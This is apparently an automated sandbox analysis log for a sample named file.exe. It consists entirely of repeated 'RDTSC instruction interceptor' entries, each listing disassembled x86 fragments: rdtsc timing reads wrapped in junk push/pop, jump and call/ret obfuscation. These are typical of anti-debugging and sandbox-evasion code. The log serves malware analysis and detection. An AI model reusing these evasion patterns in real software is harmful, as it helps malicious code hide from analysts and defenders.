                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C133 second address: 56C139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C139 second address: 56C13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C13D second address: 56C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F55E4D05137h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C15F second address: 56C164 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D555 second address: 56D559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EB77 second address: 56EB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E8CD second address: 56E8E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E8E7 second address: 56E8EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57007E second address: 570083 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570083 second address: 570091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570091 second address: 570097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570097 second address: 57009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57604B second address: 576052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576052 second address: 576057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576544 second address: 57654A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654A second address: 57654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654E second address: 57657B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jbe 00007F55E4D05126h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F55E4D05135h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775DB second address: 5775DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775DF second address: 5775E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775E3 second address: 57762C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a pop edi 0x0000000b jmp 00007F55E4D1D2DFh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F55E4D1D2D8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1E05h], ebx 0x00000032 push eax 0x00000033 push edi 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57672B second address: 576731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576731 second address: 5767B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, dword ptr [ebp+122D2AC1h] 0x00000011 or dword ptr [ebp+122D20F0h], edx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e xor dword ptr [ebp+122D1AF3h], ebx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F55E4D1D2D8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+12461DAEh] 0x0000004b mov eax, dword ptr [ebp+122D13C9h] 0x00000051 mov ebx, edx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007F55E4D1D2D8h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 00000014h 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f mov edi, ebx 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577796 second address: 5777BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F55E4D05134h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5767B5 second address: 5767BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578518 second address: 57851C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5777BE second address: 5777C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5767BA second address: 5767C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57851C second address: 5785AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F55E4D1D2DEh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F55E4D1D2D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 call 00007F55E4D1D2E1h 0x0000002e mov edi, edx 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F55E4D1D2D8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D17DEh], ebx 0x00000053 push 00000000h 0x00000055 mov edi, dword ptr [ebp+122D2D1Dh] 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F55E4D1D2DCh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57963C second address: 579688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F55E4D05128h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 and bl, 00000011h 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D19D0h], esi 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D3166h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F55E4D0512Ch 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579688 second address: 5796A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5796A4 second address: 5796AE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A711 second address: 57A791 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F55E4D1D2E8h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F55E4D1D2D8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b stc 0x0000002c mov ebx, dword ptr [ebp+122D217Bh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F55E4D1D2D8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jnl 00007F55E4D1D2D6h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5798CC second address: 5798D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F55E4D05126h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CC6B second address: 57CC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CEDF second address: 57CEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CEE5 second address: 57CF05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F55E4D1D2E3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF05 second address: 57CF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF09 second address: 57CF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF0F second address: 57CF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57ED87 second address: 57ED8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580A70 second address: 580A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580A74 second address: 580ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 jmp 00007F55E4D1D2E0h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F55E4D1D2D8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 clc 0x0000002a mov ebx, dword ptr [ebp+122D1AF3h] 0x00000030 push 00000000h 0x00000032 mov bh, ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jnp 00007F55E4D1D2DCh 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581919 second address: 5819B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05139h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F55E4D05128h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F55E4D05128h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F55E4D05128h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c adc ebx, 7DD40C69h 0x00000062 add dword ptr [ebp+122D224Ah], edi 0x00000068 xchg eax, esi 0x00000069 jc 00007F55E4D05132h 0x0000006f jc 00007F55E4D0512Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 582A85 second address: 582B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F55E4D1D2D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 je 00007F55E4D1D2D8h 0x00000017 mov bl, 1Eh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F55E4D1D2D8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 stc 0x00000036 call 00007F55E4D1D2DFh 0x0000003b mov ebx, dword ptr [ebp+122D2B09h] 0x00000041 pop ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F55E4D1D2D8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e call 00007F55E4D1D2E4h 0x00000063 mov edi, dword ptr [ebp+122D2D51h] 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push ecx 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583A96 second address: 583AB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05130h 0x00000008 jmp 00007F55E4D0512Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F55E4D0512Ch 0x00000018 jc 00007F55E4D05126h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586AD2 second address: 586AE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D1D2D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586AE4 second address: 586AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586CBA second address: 586CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586CBE second address: 586CD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F55E4D05130h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5946FC second address: 59470D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59470D second address: 594736 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F55E4D0512Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8D4 second address: 59C8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8D8 second address: 59C8F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F55E4D05126h 0x00000014 jo 00007F55E4D05126h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8F2 second address: 59C8FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B63E second address: 59B644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B644 second address: 59B655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC39 second address: 59BC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD8D second address: 59BDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D1D2E9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDAC second address: 59BDB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D05126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEE8 second address: 59BEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F55E4D1D2D6h 0x0000000c popad 0x0000000d push edi 0x0000000e jno 00007F55E4D1D2D6h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEFD second address: 59BF07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C302 second address: 59C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C45B second address: 59C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F55E4D05139h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5EB second address: 59C647 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F55E4D1D2D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F55E4D1D2E4h 0x00000013 ja 00007F55E4D1D2D6h 0x00000019 jmp 00007F55E4D1D2E3h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F55E4D1D2E4h 0x00000025 push edi 0x00000026 pop edi 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007F55E4D1D2D6h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0191 second address: 5A01BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F55E4D05126h 0x0000000c popad 0x0000000d jns 00007F55E4D0513Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01BB second address: 5A01C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01C1 second address: 5A01EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F55E4D05126h 0x00000011 jg 00007F55E4D05126h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F55E4D0512Ah 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01EA second address: 5A01EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01EE second address: 5A01F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01F8 second address: 5A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01FC second address: 5A021E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F55E4D05134h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A34DF second address: 5A352B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F55E4D1D2E9h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F55E4D1D2E0h 0x00000017 popad 0x00000018 jmp 00007F55E4D1D2E5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A352B second address: 5A3530 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3D0 second address: 5AA3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8DDE second address: 5A8DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
